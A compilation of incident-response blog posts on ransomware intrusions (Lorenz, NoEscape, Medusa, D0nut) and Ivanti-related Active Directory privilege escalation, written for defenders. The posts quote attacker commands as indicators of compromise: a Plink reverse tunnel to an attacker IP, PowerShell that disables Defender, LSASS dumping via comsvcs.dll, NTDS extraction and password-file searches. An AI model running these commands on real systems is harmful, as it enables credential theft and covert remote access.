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Unmasking Lorenz Ransomware: A Dive into Recent Tactics, Techniques and Procedures 

Author: Zaid Baksh

In the ever-evolving landscape of cyber threats, ransomware remains a persistent menace, with groups like Lorenz actively exploiting vulnerabilities in small to medium businesses globally. Since early 2021, Lorenz has been employing double-extortion tactics, exfiltrating sensitive data before encrypting systems and threatening to sell or release it publicly unless a ransom is paid by a specified date.  

Recent investigations by NCC Group’s Digital Forensics and Incident Response (DFIR) Team in APAC have uncovered significant deviations in Lorenz’s Tactics, Techniques, and Procedures (TTPs), shedding light on the group’s evolving strategies. 

Key TTP changes:

  • New encryption extension – .sz41 
  • Random strings for file and schedule task names 
  • Binaries to create local admin accounts for persistence 
  • Scheduled tasks to conduct enumeration 
  • New encryption method – DLL – RSA using current time epoch as seed (predictable) 

Changing Encryption Extensions 

One notable shift observed in Lorenz’s recent activities is a change in their encryption extension. Previously, the group used the extensions ‘Lorenz.sz40’ or ‘.sz40’; however, during the recent compromise, a new extension, ‘.sz41,’ was identified. While seemingly minor, these extensions often serve as the group’s signature, making this change noteworthy. A change in the encryption extension can also indicate a change in the encryption methods being used. 

File and Task Naming Conventions 

During the investigation, the threat actor preferred the use of randomly generated strings, such as ‘[A-Z]{0-9},’ for file names and scheduled tasks. This includes the ransom note, now named ‘HELP__[A-Za-z]{0-9}__HELP.html,’ in contrast to the previously reported ‘HELP_SECURITY_EVENT.html.’ This demonstrates the group’s adaptability and attempts to subvert known Indicators of Compromise. 

Malicious File: Wininiw.exe 

A key discovery during the investigation was the presence of ‘Wininiw.exe’ in the ‘C:\Windows\*’ directory on compromised systems. The threat actor utilized this executable to modify the local Windows Registry, creating a new user with a specified password, and adding it to the Administrator group. Although the threat actor already had Administrator privileges, the creation of a new user may serve as a backup persistence mechanism. 

Scheduled Tasks 

To conduct enumeration, the threat actor utilized Scheduled Tasks to execute command prompt to run built-in commands. These commands matched previously reported TTPs, and primarily consisted of searching the device for cleartext passwords and dumping the result to C:\Windows\Temp. It is likely the threat actor used Scheduled Tasks to automate enumeration and to ensure their commands were being executed with SYSTEM privileges.  


We observed the threat actor employing a DLL titled ‘[A-Z]{0-9}.sz41,’ positioned within the ‘C:\Windows\*‘ directory. This DLL was responsible for both the encryption process and the creation of the ransom note. Notably, the encryption technique deviated from previously documented methods. 

In this instance, the threat actor employed the current epoch time as a seed for a random number generator, which was subsequently used to generate a passphrase and then derive the encryption key. It is worth noting that this approach introduces a level of predictability to the encryption key if the period during which the encryption occurred is known. The DLL also contained a significant amount of redundant code, which does not execute, indicating this DLL has been iterated upon and possibly customized depending on the victim’s environment. 

As ransomware gangs continue to evolve their tactics, organisations must remain vigilant and adapt their cybersecurity strategies accordingly. The recent investigation by NCC Group underscores the importance of continuous monitoring and analysis to stay ahead of ransomware threats. By understanding the evolution of Lorenz’s recent activities, organisations and cyber defenders can be better prepared to identify ransomware precursors and mitigate the risk associated with ransomware groups. 

Indicators of Compromise 

IoC Type 
“cmd.exe” /Q /C (copy \\<Domain>\NETLOGON\report.txt c:\Windows\WinIniw.exe dir dir start /b c:\Windows\WinIniw.exe dir) Command 
cmd.exe /c bcdedit /set {default} safeboot network Command 
“cmd.exe” /Q    /C dir shutdown /r /t 600 dir Command 
“cmd.exe” /Q    /C del c:\Windows\Wininiw.exe Command 
“cmd.exe” /C dir D:\ /s/b |findstr pass > C:\Windows\Temp\[A-Za-z].tmp 2> 1 Command 
“cmd.exe” /C dir D:\ /s/b |grep pass > C:\Windows\Temp\[A-Za-z].tmp 2> 1 Command 
“cmd.exe” /C dir C:\Windows\ /s/b |findstr .sz4 > C:\Windows\Temp\[A-Za-z].tmp 2> 1 Command 
cmd.exe /c schtasks /Create /F /RU Users /SC WEEKLY /MO 1 /ST 10:30 /D MON /TN “GoogleChromeUpdates” /TR Command – Scheduled Task within .sz41 DLL 
Wininiw.exe Malicious Executable 
[A-Z]{0-9}.sz41 Malicious Executable 
.sz41 Encryption extension 
HELP__[A-Za-z]{0-9}__HELP.html Ransom note 
IThelperuser Username 
!2_HelpEr_E!2_HelpEr_E Password FZSFTP – IP Addresses Port: 443 (HTTPS) FZSFTP – IP Address Port: 22 (SSH) 
GoogleChromeUpdates Scheduled Task Name within .sz41 DLL 
\[A-Za-z] Scheduled Task Name 
lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd[.]onion Lorenz Darkweb Website 

If you think your organisation may have been compromised reading any of the above indicators, please contact our 24/7 Cyber Incident Response Team immediately to conduct an assessment.  

Ivanti Zero Day – Threat Actors observed leveraging CVE-2021-42278 and CVE-2021-42287 for quick privilege escalation to Domain Admin 

Authors: David Brown and Mungomba Mulenga


NCC Group has observed what we believe to be the attempted exploitation of CVE-2021-42278 and CVE-2021-42287 as a means of privilege escalation, following the successful compromise of an Ivanti Secure Connect VPN using the following zero-day vulnerabilities reported by Volexity1 on 10/01/2024:

  • CVE-2023-46805 – an authentication-bypass vulnerability with a CVSS score of 8.2
  • CVE-2024-21887 – a command-injection vulnerability found into multiple web components with a CVSS score of 9.1

By combining these vulnerabilities threat actors can quickly access a network and obtain domain administrator privileges.

New TTPs

There is a wealth of excellent information from the Cybersecurity community detailing the subsequent tactics, techniques and procedures (TTPs) and indicators of compromise (IOCs) that have been observed since the public reporting on the Ivanti zero day. This blog focuses on the exploitation of specific CVEs, that when used together could be particularly damaging.

T1068 – Privilege Escalation – Exploitation for Privilege Escalation

NCC Group has assisted a number of clients who are dealing with the Ivanti Connect Secure VPN zero-day and in the process of doing so we identified what we believe to be follow on actions that attempted to leverage CVE-2021-422782 and CVE-2021-422873.

These are vulnerabilities in Active Directory that when combined can allow a regular user to impersonate a domain administrator.

In order to successfully exploit these in an environment there will need to be a domain controller present that is not patched against this vulnerability, the threat actor would need access to a regular domain user account and a machine user account quota above zero.

This activity shows that threat actors are quickly attempting lateral movement and privilege escalation once they have gained a foothold on a compromised Ivanti Connect Secure VPN.


If you have Ivanti Connect Secure VPNs in use, then it is advised to do the following to check if you are vulnerable to this attack or if it has been attempted in your organization:

  • Check that all of your domain controllers are patched against CVE-2021-42278 and CVE-2021-42287.
  • Check domain controller logs for suspicious activity coming from the Ivanti appliance, specifically the following:
    • Windows Security Log Event ID 5156 – The windows filtering platform has allowed a connection
    • Windows Security Log Event ID 4673 – A privileged service was called
    • Windows Security Log Event ID 4741 – A computer account was created
    • Windows Security Log Event ID 4724 – An attempt was made to reset an account’s password
    • Windows Security Log Event ID 4742 – A computer account was changed
    • Windows Security Log Event ID 4781 – The name of an account was changed

If you have been affected by the Ivanti vulnerability and see above activity that coincides with compromise you should invoke your incident response plan immediately and investigate further.


The good news is that mitigation for this issue is relatively straightforward. The following should be considered:

  • Patch all domain controllers against the underlying CVEs
  • Set the machine account quota for standard users to zero

Please ensure to test the impact of any changes within your environment before applying mitigations.


It appears that threat actors are rapidly stringing CVE’s together to take advantage of the access the Ivanti Zero day has provided. NCC Group has not been able to attribute the attacks at this time or define what the end objectives were, as the attacks were interrupted.

The Ivanti issue does present an opportunity for initial access brokers to plant backdoors in environments however, leading to the possibility of follow on action taking place weeks or months after the initial compromise of the Ivanti Connect Secure VPN.

It underscores how important it is that there is a thorough investigation of the wider environment if an Ivanti compromise is detected.

If you think you are experiencing an attack contact our 24/7 incident response team using this link.

Is this the real life? Is this just fantasy? Caught in a landslide, NoEscape from NCC Group

Author: Alex Jessop (@ThisIsFineChief)



This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving the Ransomware-as-a-Service known as NoEscape.

Below provides a summary of findings which are presented in this blog post: 

  • Initial access gained via a publicly disclosed vulnerability in an externally facing server
  • Use of vulnerable drivers to disable security controls
  • Remote Desktop Protocol was used for Lateral Movement
  • Access persisted through tunnelling RDP over SSH
  • Exfiltration of data via Mega
  • Execution of ransomware via scheduled task


NoEscape is a new financially motivated ransomware group delivering a Ransomware-as-a-Service program which was first observed in May 2023 being advertised on a dark web forum, as published by Cyble [1]. It is believed they are a spin-off of the group that used to be known as Avaddon. This post will focus on the Tactics, Techniques and Procedures employed by a threat actor utilising NoEscape Ransomware in a recent Incident Response Engagement.

Review of the NoEscape dark web portal and their list of victims shows no trends in industries targeted which suggests they are opportunistic in nature. To date, 89 victims (18 active) have been posted on the NoEscape portal, with the first being published on 14th June 2023. Monetary gain is the main objective of this ransomware group. In addition to the usual double extortion method of ransomware and data exfiltration which has been popular in recent years, NoEscape also has a third extortion method: the ability to purchase a DDoS/Spam add on to further impact victims.

Incident Overview

NoEscape appear to target vulnerable external services, with the initial access vector being via the exploitation of a Microsoft Exchange server which was publicly facing in the victim’s environment. Exploitation led to webshells being created on the server and gave the threat actor an initial foothold into the environment.

The threat actor seemed opportunistic in nature, whose objective was monetary gain with a double extortion method of ransomware which included data exfiltration. However, they did appear low skilled due to a kitchen sink approach employed when trying to disable antivirus and dump credentials. Multiple different tools were deployed to enact the same job for the threat actor, which is quite a noisy approach often not observed by the more sophisticated threat actor.

A secondary access method was deployed to ensure continued access in the event that the initial access vector was closed to the threat actor. Data was exfiltrated to a well-known cloud storage provider, however this was interrupted due to premature execution of the ransomware which encrypted files that were being exfiltrated.


  • T – Initial Access gained via webshell
  • T+1 min – Initial recon and credential dumping activity
  • T+9 min – Secondary access method established via Plink
  • T+18 days – Second phase of credential dumping activity
  • T+33 days – Data Exfiltration
  •  T+33 days – Ransomware Executed

Mitre TTPs

Initial Access

T1190 – Exploit Public-Facing Application

In keeping with the opportunistic nature, initial access was gained through exploiting the vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell.

WebShell were uploaded to the victims Microsoft Exchange server and gave the threat actor an initial foothold on the network.


T1059.001 – Command and Scripting Interpreter: PowerShell

PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored. This was an attempt to ensure webshells were not detected and remediated by the antivirus.

T1059.003 – Command and Scripting Interpreter: Windows Command Shell

Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.

  • net  localgroup administrators
  • cmd.exe  /c net group \”REDACTED” /domain
  • cmd.exe  /c WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

T1053.005 – Scheduled Task

As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.


T1505.003 – Server Software Component: Web Shell

Web Shells provided the threat actor continued access to the estate through the initial access vector.

Privilege Escalation

T1078.002 – Valid Accounts: Domain Accounts

Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution

T1078.003 – Valid Accounts: Local Accounts

The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.

Defence Evasion

T1562.001 – Impair Defences: Disable or Modify Tools

The threat actor showed their potential lack of experience as multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.

Gmer.exeGMER is a rootkit detector and remover, utilised by threat actors to identify and kill processes such as antivirus and EDR
aswArPot.sysAn Avast antivirus driver deployed by threat actors to disable antivirus solutions.
mhyprot2.sysGenshin Impact anti-cheat driver which is utilised by threat actors to kill antivirus processes.

Credential Access

T1003 – Credential Dumping

Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.

CSDump.exeUnknown dumping tool (no longer on disk)
Fgdump.exeA tool for mass password auditing of the Windows systems by dumping credentials from LSASS
MemoryDumper.exeCreates an encrypted memory dump from LSASS process to facilitate offline cracking of passwords hashes.


T1087.001 – Account Discovery: Local Account

A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:

net localgroup administrators

net group “REDACTED” /domain

T1018 – Remote System Discovery

Similarly, inbuilt Windows commands were also used to discover information on the network, such as the primary domain controller for the estate:

netdom query /d:REDACTED PDC

Lateral Movement

T1021.001 – Remote Desktop Protocol

Valid domain credentials were obtained through dumping the LSASS process, these accounts were then used to laterally move across the environment via RDP.

Command and Control

T1572 – Protocol Tunnelling

Secondary method of access was deployed by the threat actor, in the event that the initial access vector was closed, by deploying PuTTY link onto multiple hosts in the environment. A SSH tunnel was created to present RDP access to the host from a public IP address owned by the threat actor.

p64.exe [email protected][.]238 -pw REDACTED -P 443 -2 -4 -T -N -C -R

T1219 – Remote Access Software

The threat actor also utilised software already deployed onto the estate to maintain access, in this scenario obtaining credentials to the TeamViewer deployment.


T1048.002 – Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol

As has become common when data is exfiltrated from a victims estate in recent years, the MegaSync.exe utility was used to exfiltrate data from the estate directly to Mega’s cloud storage platform.


T1486 – Data Encrypted for Impact

The encryptor targeted all files on the C:\ drive except those with the below extension:

bat, bin, cmd, com, cpl, dat, dll, drv, exe, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme

IOC List

142D950E7DD975056BD3487672C14C26450D55C1SHA1Mega Sync
2F366382D2DB32AACA15F9CADC14C693B33C361FSHA1Ransomware binary
4709827c7a95012ab970bf651ed5183083366c79SHA1Putty Link
75DB5A0B47783B4E4C812CF521C3A443FACB6BBBSHA1Ransomware binary
BB3593007FE44993E102830EDC3255836A97FB01SHA1Ransomware binary
214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6BSHA256Mega Sync
53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945SHA256Ransomware binary
828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924dSHA256Putty Link
078212DEA0C7FD9CDFA40DBB320B29900F4E8BA0E64D2199F6CAE0BC23D1C625SHA256Ransomware binary
2020CAE5115B6980D6423D59492B99E6AAA945A2230B7379C2F8AE3F54E1EFD5SHA256Ransomware binary
172.93.181[.]238IPMalicious IP used for tunnelling via Plink
66.203.125[.]14IPMega IP


Tactic Technique ID Description  
Initial AccessExploit Public-Facing ApplicationT1190The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207, commonly known as ProxyShell, were exploited
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001PowerShell was utilized to add an exclusion path to the anti-virus to prevent the web shells from being detected
ExecutionCommand and Scripting Interpreter: Windows Command ShellT1059.003Native Windows commands were utilised during the discovery phase of the endpoint and victim estate
ExecutionScheduled TaskT1053.005A scheduled task was utilised to execute the ransomware binary
PersistenceServer Software Component: Web ShellT1505.003Web Shells were uploaded to the Exchange server via exploitation of the ProxyShell vulnerabilities
Privilege EscalationValid Accounts: Domain AccountsT1078.002Credentials to domain accounts were obtained and utilised for lateral movement
Privilege EscalationValid Accounts: Local AccountsT1078.003A disabled local account was re-enabled by the threat actor and used.
Defence EvasionImpair Defenses: Disable or Modify ToolsT1562.001Tooling was deployed in an attempt to disable the deployed endpoint security controls
Credentials AccessCredential DumpingT1003Various different tools were deployed to dump credentials from LSASS
DiscoveryAccount Discovery: Local AccountT1087.001‘net’ native Windows command was utilised to discovery users in the domain administrator group
DiscoveryRemote System DiscoveryT1018‘netdom’ was utilised to discover the primary domain controller for the victims estate
Lateral MovementRemote Desktop ProtocolT1021.001The primary method of lateral movement was RDP
Command and ControlProtocol TunnellingT1572PuTTY link, also known as Plink, was used to tunnel RDP connections over SSH to provide the threat actor with direct access to the Exchange server as back-up to the web shells
Command and ControlRemote Access SoftwareT1219Access was gained to the existing TeamViewer deployment and utilised for lateral movement
ExfiltrationExfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 ProtocolT1048.002MegaSync was utilised to exfiltrate data to the cloud storage solution Mega
ImpactData Encrypted for ImpactT1486Ransomware was deployed across the estate


[1] – Cyble — ‘NoEscape’ Ransomware-as-a-Service (RaaS)

[2] – Meet NoEscape: Avaddon ransomware gang’s likely successor – RedPacket Security

Don’t throw a hissy fit; defend against Medusa

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families 

Author: Molly Dewis 


Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.   

In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa. 

Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims. 


This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.  

Below provides a summary of findings which are presented in this blog post: 

  • Use of web shells to maintain access. 
  • Utilising PowerShell to conduct malicious activity. 
  • Dumping password hashes.  
  • Disabling antivirus services.  
  • Use of Windows utilises for discovery activities.  
  • Reverse tunnel for C2. 
  • Data exfiltration.  
  • Deployment of Medusa ransomware. 


Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.  

Incident Overview 

Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.  


T – Initial Access gained via web shells.  

T+13 days – Execution activity. 

T+16 days – Persistence activity. 

T+164 days – Defense Evasion activity. 

T+172 days – Persistence and Discovery activity. 

T+237 days – Defense Evasion and Credential Access Activity started. 

T+271 days – Ransomware Executed.  

Mitre TTPs 

Initial Access 

The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.  


PowerShell was leveraged by the threat actor to conduct various malicious activity such as:   

  • Downloading executables  
    • Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc … 
  • Disabling Microsoft Defender 
    • Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force; 
  • Deleting executables 
    • Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe 
  • Conducting discovery activity  
    • Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain 

Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’. 

Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.  

  • powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi 
  • msiExec.exe /i anydesk.msi /qn 

A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI 

Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.   


Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>. 

Defence Evasion 

Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.  

Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\” 

The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.  

Figure 1 – Sophos.exe.
Figure 1 – Sophos.exe. 

The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities. 

Credential Access 

The following credential dumping techniques were utilised by the threat actor:  

  • Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.  
  • Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable. 
  • An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll. 
    • powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full 
  • he built-in Windows tool ntdsutil.exe was used to extract the NTDS:  
    • powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q 


The threat actor conducted the following discovery activity: 

Type of discovery activity Description 
nltest /trusted_domains Enumerates domain trusts 
net group ‘domain admins’ /domain Enumerates domain groups 
net group ‘domain computers’ / domain Enumerates domain controllers 
ipconfig /all Learn about network configuration and settings 
tasklist Displays a list of currently running processes on a computer 
quser Show currently logged on users 
whoami Establish which user they were running as 
wmic os get name Gathers the name of the operating system 
wmic os get osarchitecture Establishes the operating system architecture 

Lateral Movement 

Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network. 

Command and Control 

A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used. 

Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.  


Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.  


The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.  

Indicators of Compromise 

IOC Value Indicator Type Description  
webhook[.]site Domain Malicious webhook 
bashupload[.]com Domain Download JAVA64.exe and RW.exe 
tmpfiles[.]org Domain Download re.exe 
134.195.88[.]27:80 IP:PORT C2 
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 SHA256 trust.exe (Mimikatz.exe) 
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 SHA256 JAVA_V01.exe  
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 SHA256 testy.exe / gmer_th.exe  
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 SHA256 JAVA_V02.exe  
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6  SHA256 Sophos.exe 
C:\Users\Sophos.exe File Path Sophos.exe 
C:\Users\admin\Desktop\ File Path trust.exe JAVA_V01.exe testy.exe gmer_th.exe JAVA_V02.exe 
C:\ProgramData\JWrapper-Remote Access\ File Path JWrapper files 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> File Path GhostWebshell compiled files 
C:\Windows\PSEXESVC.exe File Path PsExec 
C:\Users\<USERS>\AppData\Local\Temp\LAdHW.sys File Path Disables AV 
C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe File Path PDQDeployRunner – used to deploy LAdHW.sys 
C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe File Path Ransomware executable 


Tactic Technique ID Description  
Initial Access Exploit Public-Facing Application T1190 A vulnerable application hosted by an external facing web server was exploited .  
Execution  Windows Management Instrumentation T1047 WMI used to remotely execute a cmd.exe process.  
Execution  Scheduled Task/Job: Scheduled Task T1053.005 Execute a.bat 
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was leveraged to execute malicious commands.  
Execution  Software Deployment Tools T1072 PDQ Deploy was installed to deploy LAdHW.sys. 
Execution System Services: Service Execution T1569.002 PsExec was installed as a service.  
Persistence Create Account: Domain Account T1136.0012 A new user ‘admin’ was created to maintain access.  
Persistence Server Software Component: Web Shell T1505.003 Web shells were utilised to maintain access.  
Defense Evasion Obfuscated Files or Information: Software Packing T1027.002 Sophos.exe was packed with Themida. 
Defense Evasion  Indicator Removal: File Deletion T1070.004 Malicious executables were deleted after use.   
Defense Evasion Indicator Removal: Clear Persistence T1070.009 Malicious executables were deleted after use.   
Defense Evasion Obfuscated Files or Information T1027 Base64 encoded PowerShell commands were utilised to download malicious executables.  
Defense Evasion  Modify Registry T1112 The WDigest registry key was modified to enable credential dumping activity. 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 Antivirus services were disabled.  
Defense Evasion Impair Defenses: Disable or Modify System Firewall T1562.004 Firewall rules were deleted.  
Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz was utilised.  An LSASS memory dump was created.  
Credential Access OS Credential Dumping: NTDS T1003.003 Ntdsutil.exe was used to extract the NTDS. 
Discovery Domain Trust Discovery T1482 Nltest was used to enumerate domain trusts.  
Discovery Permission Groups Discovery: Domain Groups T1069.002 Net was used to enumerate domain groups. 
Discovery System Network Configuration Discovery T1016 Ipconfig was used to learn about network configurations.  
Discovery System Service Discovery T1007 Tasklist was used to display running processes.  
Discovery Remote System Discovery T1018 Net was used to enumerate domain controllers.  
Discovery System Owner/User Discovery T1033 Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as.  
Discovery System Information Discovery T1082 Wmic was used to gather the name of the operating system and its architecture.  
Lateral Movement  Remote Services: Remote Desktop Protocol T1021.001 RDP was used to laterally move through the environment.  
Command and Control Ingress Tool Transfer T1105 PowerShell commands were used to download and execute malicious files.  
Command and Control Remote Access Software T1219 JWrapper and AnyDesk were leveraged. 
Command and Control Protocol Tunnelling T1572 A reverse tunnel was established.   
Exfiltration  Exfiltration TA0010 Data was exfiltrated and published to the leak site.  
Impact  Data Encrypted for Impact T1486 Medusa ransomware was deployed. 
Impact Inhibit System Recovery T1490 VMs from the Hyper-V storage and local and cloud backups were deleted.  




D0nut encrypt me, I have a wife and no backups 

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families

Author: Ross Inman (@rdi_x64)


Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.  

In case you missed it, last time we analysed an Incident Response engagement involving BlackCat Ransomware. In this instalment, we take a deeper dive into the D0nut extortion group. 

The D0nut extortion group was first reported in August 2022 for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released with speculation that the ransomware deployed by the group was linked to HelloXD ransomware. There is also suspected links between D0nut affiliates and both Hive and Ragnar Locker ransomware operations. 



This post explores some of the TTPs employed by a threat actor who was observed deploying D0nut ransomware during an incident response engagement. 

Below provides a summary of findings which are presented in this blog post: 

  • Heavy use of Cobalt Strike Beacons to laterally move throughout the compromised network.  
  • Deployment of SystemBC to establish persistence.  
  • Modification of a legitimate GPO to disable Windows Defender across the domain.  
  • Leveraging a BYOVD to terminate system-level processes which may interfere with the deployment of ransomware.  
  • Use of RDP to perform lateral movement and browse folders to identify data for exfiltration.  
  • Data exfiltration over SFTP using Rclone.  
  • Deployment of D0nut ransomware.  


D0nut leaks is a group that emerged during Autumn of 2022 and was initially reported to be performing intrusions into networks with an aim of exfiltrating data which they would then hold to ransom, without encrypting any files1.  Further down the line, the group were seen adopting the double-extortion approach2. This includes encrypting files and holding the decryption key for ransom, as well as threatening to publish the stolen data should the ransom demand not be met.   

Numerous potential links have been made to other ransomware groups and affiliates, with the ransomware encryptor reportedly sharing similarities with the HelloXD ransomware strain. Indications of a link were observed through the filenames of the ransomware executable deployed throughout the incident, with the filenames being xd.exe and wxd7.exe. However, it should be noted that this alone is not compelling evidence to indicate a link between the ransomware strains.  

Incident Overview  

Once the threat actor had gained their foothold within the network, they conducted lateral movement with a focus on the following objectives: 

  • Compromise a host which stores sensitive data which can be targeted for exfiltration.  
  • Compromise a domain controller.  

Cobalt Strike was heavily utilised to deploy Beacon, the payload generated by Cobalt Strike, to multiple hosts on the network so the threat actor could extend their access and visibility. 

A Remote Desktop Protocol (RDP) session was established to a file server, which allowed the threat actor to browse the file system and identify folders of interest to target for exfiltration. Data exfiltration was conducted using Rclone to upload files to a Secure File Transfer Protocol (SFTP) server controlled by the threat actor. Rclone allows for uploading of files directly from folders to cloud storage, meaning the threat actor did not need to perform any data staging prior to the upload.  

Before deploying the ransomware, the threat actor deployed malware capable of leveraging a driver, which has been used by other ransomware groups3, to terminate any anti-virus (AV) or endpoint detection and response (EDR) processes running on the system; this technique is known as bring your own vulnerable driver (BYOVD). Additionally, the threat actor modified a pre-existing group policy object (GPO) and appended configuration that would prevent Windows Defender from interfering with any malware that was dropped on the systems.  

